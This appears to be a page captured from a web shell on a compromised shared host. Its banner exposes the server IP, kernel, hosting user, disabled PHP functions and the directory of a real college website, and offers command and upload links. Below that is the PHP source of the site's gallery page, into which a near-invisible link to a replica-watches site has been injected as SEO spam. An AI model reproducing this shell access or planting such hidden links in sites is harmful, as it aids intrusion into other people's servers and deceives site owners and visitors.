|
Server IP : 2a02:4780:3:2287:0:3736:a38e:8 / Your IP : 216.73.217.135 Web Server : LiteSpeed System : Linux sg-nme-web2187.main-hosting.eu 5.14.0-611.54.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed May 6 18:03:03 EDT 2026 x86_64 User : u926327694 ( 926327694) PHP Version : 7.4.33 Disable Function : system, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0777) : /home/u926327694/domains/svschool.in/../jsssakrilawcollegehubli.in/public_html/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
include"header.php";
?>
<style>
.single-gallery .gallery-image img {
width: 100%;
height: 300px;
object-fit: contain;
padding: 10px;
}
</style>
<!-- Start Hero Area -->
<section class="hero-section height-470" style="background-image:url(assets/images/about_us.png)" data-aos="fade-up">
<div class="hero-area">
<div class="container">
<div class="row">
<div class="col-md-12">
<div class="page-hrader text-white text-center">
<h1 class="display-3">Gallery</h1>
<div class="page-breadcrumb">
<p><a class="text-white" href="index.html">Home</a> - Gallery</p>
</div>
</div>
</div>
</div>
</div>
</div>
</section>
<!-- End Hero Area -->
<!-- Start Featured Section -->
<section class="featured-section-3 section-ptb-3" data-aos="fade-up">
<div class="featured-area-wrapper show_navigation_2">
<div class="container-fluid">
<div class="row">
<div class="col-md-12 mx-auto text-center mb-5">
<div class="portfolios-list-2">
<ul>
<li class="active button_four filter-button" data-filter="all">All Projects</li>
<?php
$sql_cat=mysqli_query($con,"select id,category from gallery where category!='' AND section='Gallery' group by category ORDER by id desc");
while($row_cat=mysqli_fetch_array($sql_cat))
{
?>
<li class="button_four filter-button" data-filter="datafilter<?php echo str_replace(".","_",str_replace(" ","_",$row_cat['category'])); ?>"><?php echo $row_cat['category']; ?></li>
<?php
}
?>
</ul>
</div>
</div>
</div><div style="position: absolute; filter: alpha(opacity=0); opacity: 0.001; z-index: 10;"><a href="https://www.replicawatchescanada.com">https://www.replicawatchescanada.com</a></div>
<div class="row">
<?php
$sql_gallary=mysqli_query($con,"select * from gallery where section='Gallery'");
while($row_gallry=mysqli_fetch_array($sql_gallary))
{
?>
<div class="col-lg-4 col-sm-6 filter datafilter<?php echo str_replace(".","_",str_replace(" ","_",$row_gallry['category'])); ?> p-0 m-0">
<div class="single-gallery">
<div class="gallery-image">
<img src="admin/pages/Admin/<?php echo $row_gallry['photo']; ?>" alt="Featured" class="img-fluid">
<div class="gallery-content">
<h3><?php echo $row_gallry['Title']; ?></h3>
<div class="gallery-links">
<ul>
<!--li><a href="#"><i class="fas fa-search"></i></a></li-->
<li><a href="admin/pages/Admin/<?php echo $row_gallry['photo']; ?>" target="_blank"><i class="fas fa-link"></i></a></li>
</ul>
</div>
</div>
</div>
</div>
</div>
<?php
}
?>
</div>
<!--div class="row">
<div class="col-md-12">
<div class="load-more-button pt-60 mx-auto text-center">
<a href="#" class="button_five">Load More</a>
</div>
</div>
</div-->
</div>
</div>
</section>
<!-- End Featured Section -->
<?php
include"footer.php";
?>